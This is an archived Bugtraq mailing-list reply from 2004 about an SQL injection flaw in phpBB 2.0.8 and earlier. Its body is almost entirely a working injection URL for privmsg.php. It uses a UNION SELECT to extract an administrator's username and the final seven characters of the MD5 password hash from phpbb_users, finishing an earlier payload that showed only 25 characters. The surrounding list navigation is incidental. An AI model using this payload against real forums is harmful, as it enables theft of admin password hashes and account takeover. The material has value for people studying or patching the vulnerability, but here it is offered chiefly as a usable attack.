Re: [waraxe-2004-SA#013 - Critical sql injection bug in PhpBB 2.0.8 and in older versions]

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: [waraxe-2004-SA#013 - Critical sql injection bug in PhpBB 2.0.8 and in older versions]
From: Benjamin Tolman <rituel@xxxxxxxx>
Date: 27 Mar 2004 23:43:56 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

In-Reply-To: <20040326193014.24220.qmail@xxxxxxxxxxxxxxxxxxxxx>

It works but only display 25 chars of the MD5, to display the last 7 chars just 
do :

privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20username,null,right%28user_password,7%29,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20WHERE%20user_level=1%20LIMIT%201/*

Benjamin Tolman
Rituel@xxxxxxxx

Prev by Date: A-CART Pro & A-CART 2.0 Input Validation Holes
Next by Date: FreeBSD Security Advisory FreeBSD-SA-04:06.ipv6
Previous by thread: Re: [waraxe-2004-SA#013 - Critical sql injection bug in PhpBB 2.0.8 and in older versions]
Next by thread: Strange traffic - Outgoing TCP 3127/3198 (Not mydoom) New worm?
Index(es):
- Date
- Thread